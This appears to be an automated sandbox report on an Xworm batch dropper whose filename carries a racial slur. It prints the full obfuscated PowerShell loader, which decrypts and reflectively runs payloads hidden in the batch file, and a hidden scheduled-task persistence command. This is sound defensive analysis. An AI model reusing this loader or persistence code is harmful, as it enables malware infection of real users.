Analysis Overview
SHA256
c8bbab31f65dcdb8c9345dc14153d64f81b3ec9279b399b3cb5fba3f90a13c72
Threat Level: Known bad
The file Nigger Antivirus.bat was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Command and Scripting Interpreter: PowerShell
Drops startup file
Checks computer location settings
Adds Run key to start application
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-01 08:50
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-01 08:50
Reported
2024-06-01 08:52
Platform
win10v2004-20240508-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Win64.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Win64.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Win64 = "C:\\Users\\Admin\\AppData\\Roaming\\Win64" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Nigger Antivirus.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zfvTp9Td6Uz3dUxncpJKlosvXgD9H0/fkm+3ZY5NZUo='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nJMaSPgd1hkwVvB/iXkFKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SwHVz=New-Object System.IO.MemoryStream(,$param_var); $iWeDS=New-Object System.IO.MemoryStream; $iwTcr=New-Object System.IO.Compression.GZipStream($SwHVz, [IO.Compression.CompressionMode]::Decompress); $iwTcr.CopyTo($iWeDS); $iwTcr.Dispose(); $SwHVz.Dispose(); $iWeDS.Dispose(); $iWeDS.ToArray();}function execute_function($param_var,$param2_var){ $JTcVB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BLqXs=$JTcVB.EntryPoint; $BLqXs.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Nigger Antivirus.bat';$geghE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Nigger Antivirus.bat').Split([Environment]::NewLine);foreach ($cRSiC in $geghE) { if ($cRSiC.StartsWith(':: ')) { $ngowX=$cRSiC.Substring(3); break; }}$payloads_var=[string[]]$ngowX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_855_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_855.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_855.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_855.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zfvTp9Td6Uz3dUxncpJKlosvXgD9H0/fkm+3ZY5NZUo='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nJMaSPgd1hkwVvB/iXkFKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SwHVz=New-Object System.IO.MemoryStream(,$param_var); $iWeDS=New-Object System.IO.MemoryStream; $iwTcr=New-Object System.IO.Compression.GZipStream($SwHVz, [IO.Compression.CompressionMode]::Decompress); $iwTcr.CopyTo($iWeDS); $iwTcr.Dispose(); $SwHVz.Dispose(); $iWeDS.Dispose(); $iWeDS.ToArray();}function execute_function($param_var,$param2_var){ $JTcVB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BLqXs=$JTcVB.EntryPoint; $BLqXs.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_855.bat';$geghE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_855.bat').Split([Environment]::NewLine);foreach ($cRSiC in $geghE) { if ($cRSiC.StartsWith(':: ')) { $ngowX=$cRSiC.Substring(3); break; }}$payloads_var=[string[]]$ngowX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| US | 8.8.8.8:53 | 88.16.208.104.in-addr.arpa | udp |
Files
memory/3336-0-0x00007FFB152E3000-0x00007FFB152E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yiwx1tt4.w3x.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3336-6-0x000001D6BF050000-0x000001D6BF072000-memory.dmp
memory/3336-11-0x00007FFB152E0000-0x00007FFB15DA1000-memory.dmp
memory/3336-12-0x00007FFB152E0000-0x00007FFB15DA1000-memory.dmp
memory/3336-13-0x000001D6BF2B0000-0x000001D6BF2B8000-memory.dmp
memory/3336-14-0x000001D6BF2C0000-0x000001D6BF2FE000-memory.dmp
memory/600-16-0x00007FFB152E0000-0x00007FFB15DA1000-memory.dmp
memory/600-17-0x00007FFB152E0000-0x00007FFB15DA1000-memory.dmp
memory/600-18-0x00007FFB152E0000-0x00007FFB15DA1000-memory.dmp
memory/600-30-0x00007FFB152E0000-0x00007FFB15DA1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 661739d384d9dfd807a089721202900b |
| SHA1 | 5b2c5d6a7122b4ce849dc98e79a7713038feac55 |
| SHA256 | 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf |
| SHA512 | 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 773440cd6eb4e778c7d2115d1f231f75 |
| SHA1 | 4b600aa41fcd267817961c95b104a0717c40e558 |
| SHA256 | 64c178f2a2edc319c244fa885951e0425ad172e0c9c18d9773069fa13a44385c |
| SHA512 | af0370eb22d7153b7b71a033f56bc08796a0be9a1aa0f479585e03e099a215114f6ac059cf588999f3be36d91bc38ec64b0695071292db8e324ee7bcd505ee35 |
C:\Users\Admin\AppData\Roaming\startup_str_855.vbs
| MD5 | 1221fcafe0ceaaa4fe9f220da88d1245 |
| SHA1 | 2e450521d90cd050027f5f8db7934e15feb28054 |
| SHA256 | 3d00f566797545371876fca04ae28621a0da472c95867297e8e07243f2cd3f94 |
| SHA512 | dd0489c8682cb7b631b92549629c0614d7b331f5ce40a0c2e3a813b596621b360f5b054b7ca9e4409d998271f3ede05d56e8c1093e185b0497c44b30cc47bb46 |
C:\Users\Admin\AppData\Roaming\startup_str_855.bat
| MD5 | 3c82ee4342e97144776d64bdf3a7a9e5 |
| SHA1 | 982af698261db3b2c1f727ccf47b7e1596320e0b |
| SHA256 | c8bbab31f65dcdb8c9345dc14153d64f81b3ec9279b399b3cb5fba3f90a13c72 |
| SHA512 | 9cc377fc08b45022cd1567107c85125be986414690ba29d8467b13a77333ee1891a24647aed0914783c8a0ebfe626246d3ec96d4a0fa737f42f5b91a648f7b89 |
memory/5108-49-0x00000199447D0000-0x00000199447FE000-memory.dmp
memory/3336-50-0x00007FFB152E0000-0x00007FFB15DA1000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-01 08:50
Reported
2024-06-01 08:52
Platform
win10-20240404-en
Max time kernel
148s
Max time network
135s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Win64.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Win64.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Win64 = "C:\\Users\\Admin\\AppData\\Roaming\\Win64" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Nigger Antivirus.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zfvTp9Td6Uz3dUxncpJKlosvXgD9H0/fkm+3ZY5NZUo='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nJMaSPgd1hkwVvB/iXkFKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SwHVz=New-Object System.IO.MemoryStream(,$param_var); $iWeDS=New-Object System.IO.MemoryStream; $iwTcr=New-Object System.IO.Compression.GZipStream($SwHVz, [IO.Compression.CompressionMode]::Decompress); $iwTcr.CopyTo($iWeDS); $iwTcr.Dispose(); $SwHVz.Dispose(); $iWeDS.Dispose(); $iWeDS.ToArray();}function execute_function($param_var,$param2_var){ $JTcVB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BLqXs=$JTcVB.EntryPoint; $BLqXs.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Nigger Antivirus.bat';$geghE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Nigger Antivirus.bat').Split([Environment]::NewLine);foreach ($cRSiC in $geghE) { if ($cRSiC.StartsWith(':: ')) { $ngowX=$cRSiC.Substring(3); break; }}$payloads_var=[string[]]$ngowX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_497_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_497.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_497.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_497.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zfvTp9Td6Uz3dUxncpJKlosvXgD9H0/fkm+3ZY5NZUo='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nJMaSPgd1hkwVvB/iXkFKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SwHVz=New-Object System.IO.MemoryStream(,$param_var); $iWeDS=New-Object System.IO.MemoryStream; $iwTcr=New-Object System.IO.Compression.GZipStream($SwHVz, [IO.Compression.CompressionMode]::Decompress); $iwTcr.CopyTo($iWeDS); $iwTcr.Dispose(); $SwHVz.Dispose(); $iWeDS.Dispose(); $iWeDS.ToArray();}function execute_function($param_var,$param2_var){ $JTcVB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BLqXs=$JTcVB.EntryPoint; $BLqXs.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_497.bat';$geghE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_497.bat').Split([Environment]::NewLine);foreach ($cRSiC in $geghE) { if ($cRSiC.StartsWith(':: ')) { $ngowX=$cRSiC.Substring(3); break; }}$payloads_var=[string[]]$ngowX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp | |
| N/A | 127.0.0.1:4567 | tcp |
Files
memory/1760-3-0x00007FFD77FE3000-0x00007FFD77FE4000-memory.dmp
memory/1760-5-0x00000212FEB00000-0x00000212FEB22000-memory.dmp
memory/1760-10-0x00007FFD77FE0000-0x00007FFD789CC000-memory.dmp
memory/1760-12-0x00007FFD77FE0000-0x00007FFD789CC000-memory.dmp
memory/1760-11-0x00000212FECB0000-0x00000212FED26000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ryahetz4.3g2.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1760-25-0x00007FFD77FE0000-0x00007FFD789CC000-memory.dmp
memory/1760-29-0x00000212FEC90000-0x00000212FEC98000-memory.dmp
memory/1760-30-0x00000212FED30000-0x00000212FED6E000-memory.dmp
memory/4268-42-0x00007FFD77FE0000-0x00007FFD789CC000-memory.dmp
memory/4268-74-0x00007FFD77FE0000-0x00007FFD789CC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5d49723d4c5738eaaea461b2d40cb7f5 |
| SHA1 | 786b2ca08903667dbbcde5567d892f249c32c1ce |
| SHA256 | 62f4c7666f2d82bf87def1af660334446dd25c6148d64e9e6abf1d6c33200dc3 |
| SHA512 | 39b85b7f63f837faab7150a9c7de0aaf28397b66be059441cd2fd0f1c490ca83e120414de9141513cd1832b0312777d9d3ed90d118ad508350ea1adc3a76e1b3 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
C:\Users\Admin\AppData\Roaming\startup_str_497.vbs
| MD5 | eb514becbfe5e30f0b6e9995b95ba2d9 |
| SHA1 | 9d2136af6346590a8710858c99ade24cd10e70a0 |
| SHA256 | 1b70d0989e0c6c202e100cccf76b3693c1ac7062b47d92aa035b72d20bd06b16 |
| SHA512 | 2a139c8030ae51587c9415afe63c71322f6ea4a5683efb04c8f11089f92bf4a77bbbaf87c8172aa43028d6d2f1e4952e79f7d9eba83c29d9e53b713fcbc08114 |
C:\Users\Admin\AppData\Roaming\startup_str_497.bat
| MD5 | 3c82ee4342e97144776d64bdf3a7a9e5 |
| SHA1 | 982af698261db3b2c1f727ccf47b7e1596320e0b |
| SHA256 | c8bbab31f65dcdb8c9345dc14153d64f81b3ec9279b399b3cb5fba3f90a13c72 |
| SHA512 | 9cc377fc08b45022cd1567107c85125be986414690ba29d8467b13a77333ee1891a24647aed0914783c8a0ebfe626246d3ec96d4a0fa737f42f5b91a648f7b89 |
memory/4204-113-0x0000020E7AB20000-0x0000020E7AB4E000-memory.dmp
memory/1760-117-0x00007FFD77FE0000-0x00007FFD789CC000-memory.dmp